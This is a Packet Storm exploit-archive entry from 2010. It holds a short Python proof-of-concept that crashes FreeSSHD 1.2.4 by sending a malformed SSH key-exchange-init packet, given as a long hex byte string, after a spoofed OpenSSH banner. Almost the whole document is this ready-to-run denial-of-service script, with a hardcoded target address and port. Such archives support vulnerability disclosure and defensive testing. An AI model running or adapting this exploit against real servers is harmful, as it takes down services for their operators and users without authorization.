FreeSSHD 1.2.4 Buffer Overflow Denial Of Service

2010-03-22T00:00:00
ID PACKETSTORM:87529
Type packetstorm
Reporter Pi3rrot
Modified 2010-03-22T00:00:00

Description

                                        
                                            `  
  
#!/usr/bin/env python  
  
"""  
# Exploit Title: FreeSSHD 1.2.4 Remote Buffer Overflow DoS  
# Date: 22-03-2010  
# Author: Pi3rrot - tagazok [At] gmail [D0t] com ak37@freenode  
# Software Link: http://www.freesshd.com/  
# Version: 1.2.4  
# Tested on: Windows XP SP3 fr  
  
# Explications : This pof just may crash FreeSSHD 1.2.4 on ssh2 connexion.  
It use a malformed string on the SSH Key Exchange Init Corruption  
Exploit tested on Windows SP3 fr  
  
maybe it can be more exploited ?  
  
Greets to the metasploit project & PV Eeckhoutte tutorials  
"""  
  
import sys  
import socket  
  
host = "192.168.0.14"  
port = 22  
  
print "********************************************************"  
print " FreeSSHD 1.2.4 Buffer Overflow DoS"  
print " by Pi3rrot"  
print " tagazok@gmail.com<mailto:tagazok@gmail.com>"  
print "********************************************************"  
  
banner = "SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n"  
  
key = "\x00\x00\x03\x14\x082\xff\xff\x9f\xde\x5d\x5f\xb3\x07\x8f\x49\xa7\x79\x6a\x03\x3d\xaf\x55\x00\x00\x00\x7e\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68\x61\x32\x35\x36\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68\x61\x31\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x34\x2d\x73\x68\x61\x31\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x2d\x73\x68\x61\x31\x00\x00\x00\x0fssh-rsa,ssh-dss\x00\x00\x00\x9d\x61\x65\x73\x31\x32\x38\x2d\x63\x62\x63\x2c\x33\x64\x65\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66\x69\x73\x68\x2d\x63\x62\x63\x2c\x63\x61\x73\x74\x31\x32\x38\x2d\x63\x62\x63\x2c\x61\x72\x63\x66\x6f\x75\x72\x31\x32\x38\x2c\x61\x72\x63\x66\x6f\x75\x72\x32\x35\x36\x2c\x61\x72\x63\x66\x6f\x75\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x62\x63\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x72\x69\x6a\x6e\x64\x61\x65\x6c\x2d\x63\x62\x63\x40\x6c\x79\x73\x61\x74\x6f\x72\x2e\x6c\x69\x75\x2e\x73\x65\x2c\x61\x65\x73\x31\x32\x38\x2d\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x74\x72\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00\x00\x9d\x61\x65\x73\x31\x32\x38\x2d\x63\x62\x63\x2c\x33\x64\x65\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66\x69\x73\x68\x2d\x63\x62\x63\x2c\x63\x61\x73\x74\x31\x32\x38\x2d\x63\x62\x63\x2c\x61\x72\x63\x66\x6f\x75\x72\x31\x32\x38\x2c\x61\x72\x63\x66\x6f\x75\x72\x32\x35\x36\x2c\x61\x72\x63\x66\x6f\x75\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x62\x63\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x72\x69\x6a\x6e\x64\x61\x65\x6c\x2d\x63\x62\x63\x40\x6c\x79\x73\x61\x74\x6f\x72\x2e\x6c\x69\x75\x2e\x73\x65\x2c\x61\x65\x73\x31\x32\x38\x2d\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x74\x72\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00\x00\x69\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2c\x75\x6d\x61!  
\x63\x2d\x36\x34\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2d\x39\x36\x2c\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2d\x39\x36\x00\x00\x00\x69\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2c\x75\x6d\x61\x63\x2d\x36\x34\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2d\x39\x36\x2c\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2d\x39\x36\x00\x00\x00\x1a\x7a\x6c\x69\x62\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x7a\x6c\x69\x62\x2c\x6e\x6f\x6e\x65\x00\x00\x00\x1a\x7a\x6c\x69\x62\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x7a\x6c\x69\x62\x2c\x6e\x6f\x6e\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
  
  
  
buffer = banner + key  
  
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
sock.connect((host, port))  
  
print '[+] reponse du serveur : ' + sock.recv(1000)  
  
sock.send(buffer)  
print '[+] Buffer sent'  
  
  
  
sock.close()  
  
  
  
`